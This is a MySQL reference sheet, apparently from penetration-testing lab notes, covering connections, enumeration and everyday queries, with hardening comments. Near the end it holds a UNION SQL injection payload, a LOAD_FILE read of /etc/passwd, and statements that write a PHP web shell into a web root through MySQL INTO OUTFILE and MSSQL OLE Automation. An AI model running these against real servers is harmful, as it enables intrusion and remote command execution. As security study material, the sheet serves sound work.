MySQL
MySQL
default system schemas/databases:
mysql
- the system database that contains the tables storing information required by the MySQL server
information_schema
- provides access to database metadata
performance_schema
- a feature for monitoring MySQL Server execution at a low level
sys
- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
# Connect to a remote server; -p with no value prompts for the password.
mysql -h 10.10.97.109 -u root -p
# A password given inline (-pPassword123) lands in shell history and is visible to other
# users in the process list; prefer the prompt form above, or a login path created with
# mysql_config_editor.
mysql -h 10.10.97.109 -u root -pPassword123
# List the databases the connected account is allowed to see.
show databases;
Tryhackme - network services 2
# Connect to the local server as root, prompting for the password.
mysql -u root -p
If you're already in the box
# Show every privilege granted to an account. When reviewing least privilege, look for
# global grants such as FILE or ALL PRIVILEGES on an application account: they allow
# server-side file reads and writes, not just table access.
SHOW GRANTS FOR 'u1'@'localhost';
https://dev.mysql.com/doc/refman/8.0/en/show-grants.html
# Connect to a remote host with an explicit port (-P 3306 is MySQL's default port).
mysql -u root -h docker.hackthebox.eu -P 3306 -p
# Enumerate step by step: databases, then the tables of one database, then rows and columns.
show databases;
# "database name" is a placeholder. MySQL quotes identifiers with backticks (`db_name`);
# double quotes only act as identifier quotes when sql_mode includes ANSI_QUOTES.
use "database name";
show tables;
# SELECT * is fine for interactive exploration; application code should list its columns.
SELECT * FROM table_name;
# Column names, types, nullability and key information for the table.
Describe table_name;
# Insert one row giving every column in table order, or several rows naming only the
# columns supplied. These examples store passwords in clear text; a production schema
# stores a salted password hash instead.
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
# Schema changes: drop the whole table; add, rename, retype and drop a column.
# RENAME COLUMN needs MySQL 8.0; older versions use ALTER TABLE ... CHANGE old new type.
DROP TABLE logins;
ALTER TABLE logins ADD newColumn INT;
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
ALTER TABLE logins MODIFY oldColumn DATE;
ALTER TABLE logins DROP oldColumn;
# UPDATE with a WHERE filter; without one every row in the table would be changed.
UPDATE logins SET password = 'change_password' WHERE id > 1;
# Sorting: ascending by default, DESC to reverse, several keys separated by commas.
SELECT * FROM logins ORDER BY password;
SELECT * FROM logins ORDER BY password DESC;
SELECT * FROM logins ORDER BY password DESC, id ASC;
# Paging: LIMIT count, or LIMIT offset, count (here: skip one row, return two).
SELECT * FROM logins LIMIT 2;
SELECT * FROM logins LIMIT 1, 2;
# Filtering. LIKE wildcards: % matches any run of characters, _ matches exactly one
# character, so '___' matches usernames that are exactly three characters long.
SELECT * FROM logins WHERE id > 1;
SELECT * FROM logins where username = 'admin';
SELECT * FROM logins WHERE username LIKE 'admin%';
SELECT * FROM logins WHERE username like '___';
# Combining two conditions with AND.
select first_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';
# Boolean operators: each SELECT evaluates to 1 (true) or 0 (false); the "= n" line under
# each query is the value it returns. && and || are MySQL aliases for AND and OR, and != is
# the same as <>. (With sql_mode PIPES_AS_CONCAT, || becomes string concatenation instead.)
SELECT 1 = 1 AND 'test' = 'test';
= 1
SELECT 1 = 1 AND 'test' = 'abc';
= 0
SELECT 1 = 1 OR 'test' = 'abc';
= 1
SELECT 1 = 2 OR 'test' = 'abc';
= 0
SELECT NOT 1 = 1;
= 0
SELECT NOT 1 = 2;
= 1
SELECT 1 = 1 && 'test' = 'abc';
= 0
SELECT 1 = 1 || 'test' = 'abc';
= 1
SELECT 1 != 1;
= 0
# Negated equality on its own, and combined with a second condition.
SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;
# Schema-qualified name: reads the users table of my_database without a prior USE.
SELECT * FROM my_database.users;
# Lists database names from the metadata schema. An account only sees the schemas it holds
# some privilege on, so a least-privilege application account limits what is enumerable here.
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
# UNION-based SQL injection payload, of the kind that works when a string parameter is
# concatenated into a query. Prevention is bound parameters; detection is request or query
# logs containing UNION together with INFORMATION_SCHEMA references.
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
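# secure_file_priv controls server-side file access (INTO OUTFILE, LOAD DATA, LOAD_FILE):
# a directory confines it to that directory, an empty value lifts the restriction, and
# NULL disables it entirely. Hardened servers set NULL or a dedicated directory that is
# outside any web root.
SHOW VARIABLES LIKE 'secure_file_priv';
# Same value from the metadata tables. The literal must use single quotes: with
# sql_mode ANSI_QUOTES a double-quoted "secure_file_priv" is parsed as an identifier and
# the query fails. INFORMATION_SCHEMA.GLOBAL_VARIABLES is deprecated in MySQL 5.7 and
# removed in 8.0, where the table is performance_schema.global_variables.
SELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name = 'secure_file_priv';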
# Write a query result to a file on the server. Needs the FILE privilege and a path
# permitted by secure_file_priv; the file is created by the OS user running mysqld, never
# by the client. INTO OUTFILE refuses to overwrite an existing file, so the second statement
# fails unless the first file is removed.
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
SELECT * from users INTO OUTFILE '/tmp/test.txt';
> linux = cat /tmp/test.txt
> linux = ls -la /tmp/test.txt (Will be owned by mysql)
# Will create a php shell exec in www directory
# Defender's view: this only succeeds when the account holds FILE, secure_file_priv allows
# the web root, and the mysqld OS user can write there. Keep secure_file_priv set, do not
# grant FILE to application accounts, and alert on new .php files in the web root that are
# owned by the mysql user.
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
# OLE Automation Procedures
# This section is Microsoft SQL Server T-SQL (sqlcmd "1>" prompts, sp_configure, sp_OA*),
# not MySQL.
# Enabling the OLE
# The option is off by default. Changing it requires ALTER SETTINGS (held by sysadmin and
# serveradmin), and sp_configure writes the change to the SQL Server error log, which is
# the detection point to monitor.
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
# Creating a file
# Writes through the FileSystemObject COM object as the SQL Server service account, so the
# write only succeeds where that account has filesystem rights. Hardening: leave Ole
# Automation Procedures disabled, run the service as a low-privilege account, and audit
# calls to sp_OACreate.
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
# Reads /etc/passwd from the server's filesystem. LOAD_FILE needs the FILE privilege, a
# path permitted by secure_file_priv, and a file readable by the mysqld OS user; when any
# of these is missing it returns NULL rather than an error, so a NULL result is not proof
# that the file is absent.
select LOAD_FILE("/etc/passwd");